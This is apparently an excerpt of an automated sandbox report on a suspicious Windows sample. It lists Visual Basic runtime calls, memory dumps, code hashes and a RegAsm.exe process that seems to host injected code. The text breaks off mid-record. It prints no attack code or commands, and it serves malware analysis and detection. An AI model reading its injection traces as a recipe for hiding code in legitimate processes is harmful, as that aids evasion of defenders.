Instruction Fuzzy Hash: BE21C971C00209ABDF00EFA5CD45AEFBBB9FF04348F10442AF110B6261D7799A119F65

Function 0054CACD Relevance: 9.0, APIs: 6, Instructions: 34COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054CAE9
__vbaVarVargNofree.MSVBVM60(?,?,?,?,00401526), ref: 0054CB01
__vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401526), ref: 0054CB0B
#644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401526), ref: 0054CB11
__vbaVarMove.MSVBVM60 ref: 0054CB26
__vbaFreeStr.MSVBVM60 ref: 0054CB2E

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$#644ChkstkFreeMoveNofreeVarg
String ID:
API String ID: 2413382268-0
Opcode ID: a1a0014cd305dd055a153db347bfe18a4f620a1b2f3d8eee7b4248e9a83d0b28
Instruction ID: 91516e5a770fb438fed177fe4cd4db63987d6c1928b45cf1ec190f2e89d7078b
Opcode Fuzzy Hash: a1a0014cd305dd055a153db347bfe18a4f620a1b2f3d8eee7b4248e9a83d0b28
Instruction Fuzzy Hash: B6F0FF71800248ABCB10EBA5CC96FCEBFBCEF44758F54452AF001B71A1D77866498B99

Function 0054B4D6 Relevance: 7.6, APIs: 5, Instructions: 86COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000016,00401526,?,?,?,0054B428,00000016,?,?,?,?,00401526), ref: 0054B4F1
__vbaRedim.MSVBVM60(00000080,00000001,00000011,00000001,00004000,00000000,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B52A
__vbaAryLock.MSVBVM60(00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B594
#644.MSVBVM60(?,00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B5B0
__vbaAryUnlock.MSVBVM60(00000016,?,00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B5BC

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$#644ChkstkLockRedimUnlock
String ID:
API String ID: 972739294-0
Opcode ID: a878a8a776cfe9b8e240bda9f778573623ae2bd9eba9b5c6304147e059cb6d47
Instruction ID: e3dd284540c14f88cdfda067450419366d4117ffcb71cf3fe1ab9ffb603cef27
Opcode Fuzzy Hash: a878a8a776cfe9b8e240bda9f778573623ae2bd9eba9b5c6304147e059cb6d47
Instruction Fuzzy Hash: 98310778A00609AFEB00CF98D885FEDBBF4FB18704F148599E505AB3A1D775E841DB94

Function 005C602C Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C6048
__vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,?,?,?,00401526), ref: 005C6089
__vbaObjSetAddref.MSVBVM60(?,00401448), ref: 005C60AD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C60D6
__vbaFreeObj.MSVBVM60 ref: 005C60E7

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$AddrefCheckChkstkFreeHresultNew2
String ID:
API String ID: 3149954519-0
Opcode ID: 3cc8e18852874f16250759c8c11ac248af0d1e09a773f61fb59e92ea7045df2a
Instruction ID: 0d89afd342ce7559d2466a9def96e7cad074bdb0e7ff9c810e223526dab3ee01
Opcode Fuzzy Hash: 3cc8e18852874f16250759c8c11ac248af0d1e09a773f61fb59e92ea7045df2a
Instruction Fuzzy Hash: A521B3B1900209EFCB009F95C84AF9DBFB4FB08744F10842AF405BB2A1C7799A55DF98

Function 0054C478 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A71C,005C92CC,00000000), ref: 0054C493

Part of subcall function 0054CAB5: __vbaChkstk.MSVBVM60(?,0054C4AF,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000), ref: 0054CABB

#644.MSVBVM60(?,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000,00000000), ref: 0054C4BF
#644.MSVBVM60(00000001,?,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000), ref: 0054C4CE
#644.MSVBVM60(?,00000000,00000001,?,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004), ref: 0054C4EA
#644.MSVBVM60(00000000,?,00000004,?,00000000,00000001,?,0054C231,?,00000008,?,00000000,00401526), ref: 0054C511

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: #644$Chkstk__vba
String ID:
API String ID: 1305800526-0
Opcode ID: 6b2d9cc96512b800c7bd6564621f2dd06ac5b1ca1f72472667c06c8f3388b359
Instruction ID: 116bbdc1301f608e60684559796d40f64f9ea6d4afa89032dd28bdacbce4ad74
Opcode Fuzzy Hash: 6b2d9cc96512b800c7bd6564621f2dd06ac5b1ca1f72472667c06c8f3388b359
Instruction Fuzzy Hash: C4116D71900609BFDB00DFA5DD4AEDE7FB8FB45708F14046AF001B61A1D675AD00DA68

Function 0054B30B Relevance: 7.5, APIs: 5, Instructions: 42COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60 ref: 0054B311
#644.MSVBVM60(?), ref: 0054B31A
#644.MSVBVM60(?,0054B190,00000000,?), ref: 0054B32F
#644.MSVBVM60(?,0054B1B0,00000000,?,0054B190,00000000,?), ref: 0054B344
#644.MSVBVM60(?,0054B1A0,00000000,?,0054B1B0,00000000,?,0054B190,00000000,?), ref: 0054B35D

Part of subcall function 0054B38C: __vbaChkstk.MSVBVM60(?,0054B36F,?,?,0054B1A0,00000000,?,0054B1B0,00000000,?,0054B190,00000000,?), ref: 0054B392

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: #644$Chkstk__vba
String ID:
API String ID: 1305800526-0
Opcode ID: 181d6d5f70a4d4d849f27430d7113cb115196f49caa97232774f408a6f1a0413
Instruction ID: 27d8f87718169baa2795bd51bdf022c2e92fb24db0cf5918baa364638dd8ad18
Opcode Fuzzy Hash: 181d6d5f70a4d4d849f27430d7113cb115196f49caa97232774f408a6f1a0413
Instruction Fuzzy Hash: 5B012871900219BBEB11AF72CC1AAED7F74FF40398F108825FC00AA1A1C775DD10D698

Function 0054B7C7 Relevance: 7.5, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054B7E3
__vbaVarDup.MSVBVM60(?,?,?,?,00401526), ref: 0054B7FB
#717.MSVBVM60(?,00000000,00000080,00000000,?,?,?,?,00401526), ref: 0054B80F
__vbaVarMove.MSVBVM60(?,00000000,00000080,00000000,?,?,?,?,00401526), ref: 0054B81A
__vbaFreeVar.MSVBVM60(0054B84A,?,00000000,00000080,00000000,?,?,?,?,00401526), ref: 0054B844

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$#717ChkstkFreeMove
String ID:
API String ID: 3540157982-0
Opcode ID: ab1a7d014dbbe29ea15a2afb88cf0cfbb1eaf08eaa2673af21091a44d3ff13ac
Instruction ID: 1c82cfde3ee95011cd28f8747bd870c61d381ec2681f481a71644f66ff2dcf80
Opcode Fuzzy Hash: ab1a7d014dbbe29ea15a2afb88cf0cfbb1eaf08eaa2673af21091a44d3ff13ac
Instruction Fuzzy Hash: 7EF01D71940248BADB10EB91C982FCDBB7CEB04B48F50847AF1017B0D1EB786B098B69

Function 005C812E Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8149
__vbaVarVargNofree.MSVBVM60(?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8161
__vbaStrVarVal.MSVBVM60(00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C816B
#644.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8171
__vbaFreeStr.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C817C

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$#644ChkstkFreeNofreeVarg
String ID:
API String ID: 1831340853-0
Opcode ID: 9d3a6655a186d40e7b92e2d6a28bb194360452f283882839a803ad74d62758b5
Instruction ID: 939f5b945dfeaef5b02db9d84dbc449400dfb3bc10ae9733ed997b090a995cb2
Opcode Fuzzy Hash: 9d3a6655a186d40e7b92e2d6a28bb194360452f283882839a803ad74d62758b5
Instruction Fuzzy Hash: D8F054B1800208BBCB00EB91CC46FAF7B7CEB44754F14452EB101B71A1DA78694186A8

Function 005C805A Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C8076
#595.MSVBVM60(?,00401526,?,0000000A,0000000A), ref: 005C80B7
__vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,00401526,?,0000000A,0000000A), ref: 005C80CC
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,00401526,?,0000000A,0000000A), ref: 005C80DB

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$#595ChkstkFreeListMove
String ID:
API String ID: 2550330671-0
Opcode ID: 0b7c5203ac1eba9ef1bb84ce13d399854d091fdfa57b51b37bec03431b780bab
Instruction ID: d3ac9b0a42fd4699c624edd817dc9bf4b34b5d1655ce44120ab2d991c2380309
Opcode Fuzzy Hash: 0b7c5203ac1eba9ef1bb84ce13d399854d091fdfa57b51b37bec03431b780bab
Instruction Fuzzy Hash: A80105B2800208AFDB01DFD1D942BDEBBBDEB04704F20452AF505AA191D7796A04CF55

Function 0054DCCE Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054DDAA,?,00006011,?,?,?,?,00401526), ref: 0054DCE9
__vbaRefVarAry.MSVBVM60(?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011,?,?,?,?), ref: 0054DCFE
__vbaUbound.MSVBVM60(00000001,00000000,?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011), ref: 0054DD07
__vbaVarMove.MSVBVM60(00000001,00000000,?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011), ref: 0054DD1C

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$ChkstkMoveUbound
String ID:
API String ID: 2614284155-0
Opcode ID: 58fc5ea6fd03c023577e3f3d30c069ce85fd0f6325fca40ca70762288b17780b
Instruction ID: 9b6dd94111d553ea0f2725c283f05c7fb2de15440f9a9b03eafbdeffcf44c394
Opcode Fuzzy Hash: 58fc5ea6fd03c023577e3f3d30c069ce85fd0f6325fca40ca70762288b17780b
Instruction Fuzzy Hash: 26F08271840208BFDB10AF81CC56F8DBFB8FB45B44F10483AF4057A1A1D7B919008669

Function 0054CE0F Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60 ref: 0054CE15
__vbaSetSystemError.MSVBVM60 ref: 0054CE22
__vbaSetSystemError.MSVBVM60(000001F4), ref: 0054CE37
__vbaSetSystemError.MSVBVM60(000001F4), ref: 0054CE44

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$ErrorSystem$Chkstk
String ID:
API String ID: 2749639637-0
Opcode ID: f90d450692569b3a9f01d7e63a20d750b3ec110da7088feadf4255574e2b31ad
Instruction ID: 908e86e652d5b2ea685375b740a6e849d54d4ebb4df870eee72a5a4e066e9063
Opcode Fuzzy Hash: f90d450692569b3a9f01d7e63a20d750b3ec110da7088feadf4255574e2b31ad
Instruction Fuzzy Hash: 1AF0DA71E0030AABCF00EBE6C9565ADBBB4BF0470CF10496AE810B72C1DB7D9651CB5A

Analysis Process: RegAsm.exePID: 7360, Parent PID: 7300COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	85.8%
Signature Coverage:	0%
Total number of Nodes:	106
Total number of Limit Nodes:	8

Executed Functions

Function 05979208 Relevance: 8.3, Strings: 6, Instructions: 766COMMON

Download Yara Rule

Strings

$tq, xrefs: 05979B77
$tq, xrefs: 05979B43
$tq, xrefs: 05979BAB
$tq, xrefs: 05979BB7
$tq, xrefs: 05979B83
$tq, xrefs: 05979B4F

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID: $tq$$tq$$tq$$tq$$tq$$tq
API String ID: 0-2574395493
Opcode ID: c619d40b665746fcf963d1b6a148cff515a8365f2ae11d62cc16f84c0b2bba6b
Instruction ID: 8dab5ad37731dc277d272d02daddc7f2c9d574a6cd61405049c4f44f03a56556
Opcode Fuzzy Hash: c619d40b665746fcf963d1b6a148cff515a8365f2ae11d62cc16f84c0b2bba6b
Instruction Fuzzy Hash: C4528070B0410D8FDF24DB69D584BAEB7BAFB89310F648526E409EB395DB34DC818B91

Function 05975D50 Relevance: 3.0, Strings: 2, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$tq, xrefs: 059762EB
$tq, xrefs: 059762F7

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID: $tq$$tq
API String ID: 0-1837209516
Opcode ID: f5caa288929e7aef8a918f0f965952375a3d4481d8b9cf9b2ad0260ee08a3774
Instruction ID: adc31b1bbafc28d5744f7c59fba381e95b8287bf1116015444dd7130acfeb8a6
Opcode Fuzzy Hash: f5caa288929e7aef8a918f0f965952375a3d4481d8b9cf9b2ad0260ee08a3774
Instruction Fuzzy Hash: 82027070B0061A8FDB18DB75D494A6EB7B6FF84310F14852AE405EB395DB35ED86CB80

Function 0597E0E8 Relevance: 2.8, Strings: 2, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$tq, xrefs: 0597E1D6
Xxq, xrefs: 0597E1EF

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID: Xxq$$tq
API String ID: 0-142404150
Opcode ID: 662f3fffb43c9332ebbc95cde89466208059a99af8acd3767e7bc8e9a9c6b645
Instruction ID: 9336b26b681b9a49e0f1b89d8bf8d1ca6f8d03555b582caefdb9611170f05f92
Opcode Fuzzy Hash: 662f3fffb43c9332ebbc95cde89466208059a99af8acd3767e7bc8e9a9c6b645
Instruction Fuzzy Hash: C4B1B370B042199BCB18EF78945467EBBBBBFC8740B05856EE446DB388DE39DC028795

Function 010FC52C Relevance: 2.7, Instructions: 2707COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f475c1d266386655eba2effd74833af3b35e4e3a82bc585adc5bc7105afe934
Instruction ID: 7cb3eba40b73793bcb769785730d2765c3201f723005a65050007a87a0002221
Opcode Fuzzy Hash: 7f475c1d266386655eba2effd74833af3b35e4e3a82bc585adc5bc7105afe934
Instruction Fuzzy Hash: BA53F631C10B1A8ADB51EF68C880699F7B1FF99300F51D79AE49877125FB70AAC5CB81

Function 010FDBE0 Relevance: 2.3, Instructions: 2278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eedbe996eeee942919208b4760a2a59b49be7657c0e5fab0fe070c0f124e438f
Instruction ID: 45cfbaad4f9abc8c456c76d948f502babd5d6c593b932c41df7b0ecdf2c51657
Opcode Fuzzy Hash: eedbe996eeee942919208b4760a2a59b49be7657c0e5fab0fe070c0f124e438f
Instruction Fuzzy Hash: 6E331E31D1071A8EDB11EF68C88069DF7B1FF99300F55C69AE548A7225EB70EAC5CB81

Function 0044395C Relevance: 1.5, APIs: 1, Instructions: 16
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF), ref: 0044396A

Memory Dump Source

Source File: 00000001.00000002.4154134702.0000000000440000.00000040.80000000.00040000.00000000.sdmp, Offset: 00440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_440000_RegAsm.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a264d261c1b0493561de4f9e0d8715a82a6f349e06cd1d78d1bc1e7ab9ddc151
Instruction ID: 57550a90abf8859a019dce8097a4e11dae0b2e094b829864a1e91121928c7047
Opcode Fuzzy Hash: a264d261c1b0493561de4f9e0d8715a82a6f349e06cd1d78d1bc1e7ab9ddc151
Instruction Fuzzy Hash: E7D0236034C243DAF7090F54581617237F4470173673007839023D10D0CAECD7535517

Function 010F3E88 Relevance: 1.5, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\V]m, xrefs: 010F40D3

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID: \V]m
API String ID: 0-4105700344
Opcode ID: 70a57cc79af446a96a9df6f9b64b80c27324e22ae6647c5fa06241ec32e1320b
Instruction ID: 315934375400621b8ffbc58d9f003359986cba6c982362b5657aa536d83e751a
Opcode Fuzzy Hash: 70a57cc79af446a96a9df6f9b64b80c27324e22ae6647c5fa06241ec32e1320b
Instruction Fuzzy Hash: 71915C70E002099FDB54CFA9C9867DEBBF2BF88314F14812DE945EB694DB749845CB81

Function 0597A150 Relevance: .6, Instructions: 641COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e87283cbe90e1d5b209ed4b93acd611d9f751cbfc1575bffc4a8baf733913da
Instruction ID: ad4b9b29266e0760aac0526dd1f98686cbfef92edd6674e89d6dbce7e226850c
Opcode Fuzzy Hash: 9e87283cbe90e1d5b209ed4b93acd611d9f751cbfc1575bffc4a8baf733913da
Instruction Fuzzy Hash: 6D32A134B0420A9FDF14DF69D990BAEBBB6FB88310F10852AE406DB355DB35EC418B91

Function 010F4AA0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a8e016e1060ba333bf6dd67e15c402e1657581e74d9438e885477ee3a7adcd0
Instruction ID: 657c21ebefb3c618c95a822e073ae62e6f0a2803b30664b9a580a1e59e8da32f
Opcode Fuzzy Hash: 6a8e016e1060ba333bf6dd67e15c402e1657581e74d9438e885477ee3a7adcd0
Instruction Fuzzy Hash: D4B17B70E0020D8FEB54CFA9D8827AEBBF2AF88314F14852DD955E7694EB749845CB81

Function 067FD490 Relevance: 1.7, APIs: 1, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.4160093257.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_67f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e99039fc9735672021e51542bb8f5f34d83a1073a5a52bdfff85800193c016
Instruction ID: b30016225fc224a2aa6ced535f21ffacafdd07d9d7f649f1773c7592422e7056
Opcode Fuzzy Hash: 51e99039fc9735672021e51542bb8f5f34d83a1073a5a52bdfff85800193c016
Instruction Fuzzy Hash: CE511EB1C10249EFDF11CF99C984ADEBFB6BF48314F24816AE918AB220D3719945CF90

Function 0597E580 Relevance: 1.6, APIs: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d48038faf72bd1a615df370addbcabab54a835dd9f65c8cb5c9f25c0fb345e6
